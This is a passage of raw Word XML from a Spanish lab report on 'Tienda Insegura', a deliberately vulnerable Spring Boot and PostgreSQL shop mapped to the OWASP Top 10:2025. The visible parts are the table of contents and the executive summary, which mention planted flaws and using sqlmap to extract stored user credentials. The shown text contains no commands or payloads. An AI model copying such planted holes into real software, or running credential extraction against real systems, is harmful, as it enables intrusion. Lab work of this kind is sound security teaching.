    <w:p w14:paraId="6C6EA4C7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>9. Matriz de vulnerabilidades y trazabilidad OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB45004" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>10. Guía de pruebas de penetración controladas</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6E8EAD" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0.1 A01 - Broken Access Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F649256" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.2 A02 - Security Misconfiguration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604EC116" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.3 A03 - Software Supply Chain Failures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48524CA6" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.4 A04 - Cryptographic Failures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853461D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.5 A05 - Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB576CA" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.6 A06 - Insecure Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AFC53" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.7 A07 - Authentication Failures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CEC6EE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.8 A0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8 - Software or Data Integrity Failures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B27CF1" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.9 A09 - Security Logging and Alerting Failures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026FF349" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:ind w:left="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10.10 A10 - Mishandling of Exceptional Conditions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4E0CF" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">11. SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatizada con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C11BE6" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>12. Plan de evidencias</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5827F7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">13. Contramedidas previstas para </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>la Versión 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001E74E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>14. Conclusiones</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04135423" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>15. Referencias</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F6A0D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Anexo A - Estructura del proyecto</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE45C6D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Anexo B - Compatibilidad de puertos Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA8410" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Anexo C - Lista de verificación para la entrega</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516911B5" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8957"/>
        </w:tabs>
        <w:spacing w:after="50"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Anexo D - Estado de validación del paquete</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:color w:val="20385F"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:tab/>
        <w:t>22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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="16900587" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="20385F"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EA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D939ED" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Actualización en Word</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Si se agregan capturas y cambia la paginación, actualizar manualmente los números de este índice o usar Referencias &gt; Tabla de contenido. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Los </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>títulos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ya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utilizan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> estilos jerárquicos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E30CA03" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C290E3" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resumen ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D05FE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>El presente informe documenta la Versión 1 de "Tie</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>nda Insegura", una aplicación de comercio electrónico construida de manera deliberadamente vulnerable para demostrar, en un laboratorio local autorizado, riesgos asociados con el OWASP Top 10:2025. El sistema conserva funciones reales de catálogo, autentic</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ación, carrito, pedidos, administración y carga de archivos, pero incorpora fallas controladas en el código, la configuración y las dependencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371BBD96" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">La solución utiliza una arquitectura de tres servicios </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>contenedorizados</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> para el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML/CSS/JavaS</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">cript, Spring </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Boot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> para la API REST y PostgreSQL para la persistencia. Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Compose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite reproducir el escenario en Windows, Linux o macOS. Los puertos se limitan a la interfaz de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>loopback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> para reducir el riesgo de exposición accidental.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44F4F1" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>El informe in</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">cluye arquitectura, tecnologías, guía de despliegue, estructura del código, credenciales de laboratorio, mapeo de vulnerabilidades, procedimientos de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y automatización de SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obtener las credenciales almacenadas en la ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>bla usuarios. Los espacios de evidencia están preparados para que se incorporen capturas reales obtenidas durante la ejecución.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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="15A3E1DC" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="1F6F50"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil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758608" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
